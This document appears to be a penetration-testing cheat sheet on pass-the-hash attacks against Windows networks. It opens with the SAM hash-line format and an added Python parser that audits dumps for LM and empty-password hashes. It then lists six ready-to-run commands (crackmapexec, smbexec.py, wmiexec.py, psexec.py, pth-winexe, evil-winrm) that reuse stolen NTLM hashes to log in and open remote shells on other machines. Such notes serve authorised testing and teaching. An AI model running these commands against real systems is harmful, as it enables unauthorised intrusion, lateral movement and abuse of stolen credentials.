Pass the Hash
Overview
Having dumped the SAM or LSA, you now have hashes for domain or local users. Use the hash with crackmapexec
to pass it around the network and see whether it logs you into any other target(s) with that credential.
Anatomy of a Windows Hash
username:SID:LM_HASH:NT_HASH::
- The LM hash is stored for backward compatibility
- The NT hash is what gets used when authenticating to a server by IP address or by an unregistered hostname
- Otherwise, Kerberos is likely to be used
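A small parser for the hash-line format above, added here as an example and not part of the original notes. It splits a dump line into its four fields, checks that the two hashes are 32 hex characters, and flags two things an auditor wants to know from a dump: whether the LM field still carries a real hash (the well-known blank-LM value aad3b435b51404eeaad3b435b51404ee means LM storage is disabled for that account) and whether the NT hash is 31d6cfe0d16ae931b73c59d7e0c089c0, the NT hash of an empty password. Those two constants are well-known values, not taken from the page; the sample dump lines are constructed. The second field is accepted either as the numeric RID that tools usually print there or as a full S-1-... SID, so it covers the SID label used above.

```python
import re
from dataclasses import dataclass

# Well-known constants (not from the page): the LM field value that means
# "no LM hash stored", and the NT hash of the empty password.
BLANK_LM_HASH = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_PASSWORD_NT_HASH = "31d6cfe0d16ae931b73c59d7e0c089c0"

_HEX32 = re.compile(r"^[0-9a-fA-F]{32}$")
_SID_OR_RID = re.compile(r"^(S-1-\d+(-\d+)+|\d+)$")


@dataclass(frozen=True)
class DumpedHash:
    username: str
    sid: str       # RID or full SID, whatever the dump carries in field 2
    lm_hash: str   # normalised to lowercase hex
    nt_hash: str   # normalised to lowercase hex

    @property
    def lm_is_blank(self) -> bool:
        """True when no real LM hash is stored (LM backward compat off)."""
        return self.lm_hash == BLANK_LM_HASH

    @property
    def nt_is_empty_password(self) -> bool:
        """True when the NT hash corresponds to an empty password."""
        return self.nt_hash == EMPTY_PASSWORD_NT_HASH


def parse_hash_line(line: str) -> DumpedHash:
    """Parse one 'username:SID:LM_HASH:NT_HASH::' line (trailing ':' fields must be empty)."""
    fields = line.strip().split(":")
    if len(fields) < 4:
        raise ValueError(f"expected username:SID:LM_HASH:NT_HASH::, got {line!r}")
    username, sid, lm, nt = fields[:4]
    if any(fields[4:]):
        raise ValueError(f"unexpected data after NT hash in {line!r}")
    if not username:
        raise ValueError("empty username")
    if not _SID_OR_RID.match(sid):
        raise ValueError(f"second field is neither a RID nor a SID: {sid!r}")
    if not _HEX32.match(lm):
        raise ValueError(f"LM hash is not 32 hex chars: {lm!r}")
    if not _HEX32.match(nt):
        raise ValueError(f"NT hash is not 32 hex chars: {nt!r}")
    return DumpedHash(username, sid, lm.lower(), nt.lower())


def parse_dump(text: str) -> list:
    """Parse every non-blank line of a dump into DumpedHash entries."""
    return [parse_hash_line(raw) for raw in text.splitlines() if raw.strip()]


def audit_dump(text: str) -> list:
    """Return (username, finding) pairs for accounts worth a second look."""
    findings = []
    for entry in parse_dump(text):
        if not entry.lm_is_blank:
            findings.append((entry.username, "LM hash present: LM storage still enabled"))
        if entry.nt_is_empty_password:
            findings.append((entry.username, "NT hash is that of an empty password"))
    return findings


# Constructed sample dump: hex values are made up, not real account hashes.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
legacy:S-1-5-21-1-2-3-1001:00112233445566778899AABBCCDDEEFF:ffeeddccbbaa99887766554433221100:::
"""

if __name__ == "__main__":
    for user, finding in audit_dump(SAMPLE_DUMP):
        print(f"{user}: {finding}")
```

Run as-is it prints the two findings for the constructed sample (Guest has an empty-password NT hash, legacy still has an LM hash stored); feed it real dump output to get the same checks on your own data.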
Attack 1: crackmapexec --local-auth
Assumes you have the NTLM hash of a local user from the SAM database
crackmapexec smb <target-or-CIDR> -u "username" -H NT_HASH --local-auth
Attack 2: smbexec.py
smbexec.py -hashes lm-hash:nt-hash 'domain.tld/username@target'
Attack 3: wmiexec.py
wmiexec.py -hashes lm-hash:nt-hash 'domain.tld/username@target' cmd.exe
Attack 4: psexec.py
Assumes you have the NTLM hash of a local user from the SAM database. Also assumes the local user has SMB write access to a share on the target.
psexec.py -hashes lm-hash:nt-hash 'domain.tld/username@target' cmd.exe
Attack 5: pth-winexe
pth-winexe -U 'domain.tld/username%lm-hash:nt-hash' cmd.exe
Attack 6: WinRM
- WinRM over HTTP – TCP/5985
- WinRM over HTTPS – TCP/5986
Evil-WinRM on the attack box
evil-winrm -i <target_ip> -u username -H <hash>